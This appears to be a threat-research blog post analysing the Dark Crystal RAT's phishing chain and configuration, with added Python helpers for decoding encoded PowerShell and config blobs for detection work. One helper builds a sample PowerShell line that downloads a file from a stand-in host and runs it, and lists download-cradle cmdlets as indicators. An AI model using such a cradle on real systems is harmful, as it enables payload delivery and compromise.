
Remote Access Trojans (RATs) are one of the most common tools used by threat actors as a malicious payload to attack targeted hosts and steal information. One example is the Dark Crystal RAT (DCRat), which is capable of remote access, post-exploitation and data exfiltration. The Splunk Threat Research Team (STRT) analyzed and developed Splunk analytics for this RAT to help defenders identify signs of compromise within their networks.

DCRat is one of the underground commercial RAT tools used by several threat groups to attack networks and businesses (1) (2). This RAT has been identified in campaigns targeting Ukrainian organizations, as reported by CERT-UA. The payload is delivered by spear phishing emails in the first stages of the attacks.

For this blog, we look for DCRat campaign samples that we can analyze and test in the Splunk Attack Range environment with installed reverse-engineering (R.E.) tools like dnSpy and scripting tools (e.g. PowerShell, Python, batch script) to analyze the malware behavior and extract TTPs that will help the STRT generate datasets for detection development and testing.

Spear Phishing

Based on the CERT-UA initial threat report, the Dark Crystal RAT infection chain starts when victims are tricked into opening a malicious Microsoft Excel ".xls" office document containing macro code that will drop and execute a batch script named "c:\user\public\new.bat". This script will execute an embedded PowerShell script that downloads the second-stage payload responsible for downloading and executing the actual DCRat malware on the compromised host.

Figures 1.1 and 1.2 show the macro code and the content of the batch script, which is a base64-encoded PowerShell script downloader.

DCRat is a .NET compiled assembly that leverages multithreading to execute its malicious actions concurrently on a compromised host. As RAT malware, it has several capabilities to collect data, steal information or even execute post-exploitation payloads and plugins. Below are some notable behaviors of this RAT malware we found during our analysis.

Initial Configuration

DCRat will decode and decompress its configuration data embedded in the binary. This configuration will dictate what mutex and DCRat features are enabled in this compiled DCRat malware. Figure 2 shows the decoded and decompressed value of its configuration data. From Figure 2, we can see the mutex name of this malware sample, "DCR_MUTEX-PNY1ZVhO2iPJoDxTnEBp", and the set of enabled features, which include "screenshot", "telegram", "clipboard" and "sysinfo". Afterwards, it will decompress and decode another set of encoded data, which is two URLs that will be used for download and beaconing communication to its C2. If the initial beaconing gets no data back from the C2, the malware terminates its own process.
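As an added example (not code from the original post or from the Splunk Threat Research Team), the following Python triage helper shows what a defender can do with a dropped batch file like the one in Figures 1.1 and 1.2: pull the base64 argument out of the powershell command line, decode it (PowerShell's -EncodedCommand expects UTF-16LE), and flag the download-and-execute cmdlets that usually mark a second-stage downloader. The batch content and the embedded script are constructed for illustration; the function names, the indicator list and the URL are assumptions.

```python
import base64
import re
from typing import Optional

# Constructed sample (assumption, not the real new.bat): an embedded PowerShell
# downloader encoded the way "powershell -EncodedCommand" expects (UTF-16LE, then base64).
SAMPLE_PS = (
    "Invoke-WebRequest -Uri 'http://stage2.example.invalid/payload' "
    "-OutFile \"$env:TEMP\\s.exe\"; Start-Process \"$env:TEMP\\s.exe\""
)
SAMPLE_B64 = base64.b64encode(SAMPLE_PS.encode("utf-16le")).decode("ascii")

# Constructed batch file content standing in for the dropped script.
SAMPLE_BAT = (
    "@echo off\r\n"
    f"powershell.exe -NoP -W Hidden -EncodedCommand {SAMPLE_B64}\r\n"
    "exit\r\n"
)

# PowerShell accepts shortened parameter names, so -e, -ec and -enc all mean -EncodedCommand.
ENC_ARG = re.compile(
    r"(?<![\w-])-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)

# Cmdlets and methods that typically appear in a download-and-execute stage (assumed list).
INDICATORS = [
    "DownloadString", "DownloadFile", "Net.WebClient", "Invoke-WebRequest",
    "Start-BitsTransfer", "Invoke-Expression", "IEX", "Start-Process", "FromBase64String",
]


def extract_encoded_command(text: str) -> Optional[str]:
    """Return the base64 argument of -EncodedCommand (or its short forms), if present."""
    m = ENC_ARG.search(text)
    return m.group(1) if m else None


def decode_powershell_b64(blob: str) -> str:
    """Base64-decode and pick the right text encoding.

    -EncodedCommand payloads are UTF-16LE; blobs handed to FromBase64String inside a
    script are usually UTF-8. ASCII text in UTF-16LE has a NUL in every second byte,
    which is what the heuristic below checks.
    """
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2 == 0 and raw[1::2].count(0) >= len(raw) // 4:
        return raw.decode("utf-16le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def find_download_indicators(script: str) -> list:
    """Case-insensitive whole-token search for the indicator names."""
    low = script.lower()
    hits = []
    for name in INDICATORS:
        if re.search(r"(?<![\w-])" + re.escape(name.lower()) + r"(?![\w-])", low):
            hits.append(name)
    return hits


def triage_batch(text: str) -> dict:
    """Decode an embedded PowerShell command and list the cradle indicators it contains."""
    blob = extract_encoded_command(text)
    if blob is None:
        return {"encoded": False, "script": None, "indicators": []}
    script = decode_powershell_b64(blob)
    return {"encoded": True, "script": script, "indicators": find_download_indicators(script)}


if __name__ == "__main__":
    result = triage_batch(SAMPLE_BAT)
    print("decoded script:", result["script"])
    print("indicators:", result["indicators"])
```

The same `triage_batch` function can be pointed at process command-line fields from endpoint telemetry, since the encoded argument looks identical there; the decoded script, not the base64 string, is what the detection content should be written against.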
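Added example for the Initial Configuration section (not the blog's analysis script and not DCRat's own code): the post says the embedded configuration and the C2 URL list are decoded and decompressed but does not name the compression, so this Python helper assumes base64 wrapping over gzip, zlib or raw deflate and tries each in turn, then pulls out the values a detection engineer pivots on (mutex name, enabled features, C2 URLs). The JSON layout, the extra "keylogger" key and the URLs are constructed assumptions; the mutex value and the four feature names are the ones the blog shows in Figure 2.

```python
import base64
import gzip
import json
import zlib
from typing import Tuple


def wrap_layers(data: bytes, method: str) -> str:
    """Helper used only to build the constructed samples below."""
    if method == "gzip":
        data = gzip.compress(data)
    elif method == "zlib":
        data = zlib.compress(data)
    elif method == "deflate":
        comp = zlib.compressobj(wbits=-zlib.MAX_WBITS)
        data = comp.compress(data) + comp.flush()
    return base64.b64encode(data).decode("ascii")


def unwrap_layers(blob: str) -> Tuple[bytes, str]:
    """Base64-decode, then try the compression wrappers .NET code commonly uses."""
    raw = base64.b64decode(blob)
    if raw[:2] == b"\x1f\x8b":                        # GZipStream magic
        return gzip.decompress(raw), "gzip"
    for wbits, name in ((zlib.MAX_WBITS, "zlib"), (-zlib.MAX_WBITS, "deflate")):
        try:
            return zlib.decompress(raw, wbits), name  # ZLibStream / DeflateStream
        except zlib.error:
            continue
    return raw, "none"                                # plain base64, nothing to inflate


# Constructed configuration in the spirit of Figure 2 (the layout is an assumption;
# the mutex value is the one the blog shows, the C2 URLs are placeholders).
SAMPLE_CONFIG = {
    "MUTEX": "DCR_MUTEX-PNY1ZVhO2iPJoDxTnEBp",
    "screenshot": True,
    "telegram": True,
    "clipboard": True,
    "sysinfo": True,
    "keylogger": False,
}
SAMPLE_URLS = ["http://c2-a.example.invalid/gate", "http://c2-b.example.invalid/gate"]

CONFIG_BLOB = wrap_layers(json.dumps(SAMPLE_CONFIG).encode("utf-8"), "gzip")
URL_BLOB = wrap_layers("\n".join(SAMPLE_URLS).encode("utf-8"), "deflate")


def extract_config(config_blob: str, url_blob: str) -> dict:
    """Recover the values a detection engineer pivots on: mutex, features, C2 URLs."""
    cfg_bytes, cfg_method = unwrap_layers(config_blob)
    cfg = json.loads(cfg_bytes.decode("utf-8"))
    url_bytes, url_method = unwrap_layers(url_blob)
    urls = [u.strip() for u in url_bytes.decode("utf-8").splitlines() if u.strip()]
    return {
        "mutex": cfg.get("MUTEX"),
        "features": sorted(k for k, v in cfg.items() if v is True),
        "c2_urls": urls,
        "wrapping": {"config": cfg_method, "urls": url_method},
    }


if __name__ == "__main__":
    for key, value in extract_config(CONFIG_BLOB, URL_BLOB).items():
        print(f"{key}: {value}")
```

Trying the wrappers by magic bytes and then by trial keeps the helper usable when a later build changes the stream class; the recovered mutex name is a ready-made artifact for a Sysmon or EDR mutex-creation detection, and the URL list feeds network allow/deny-list checks.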
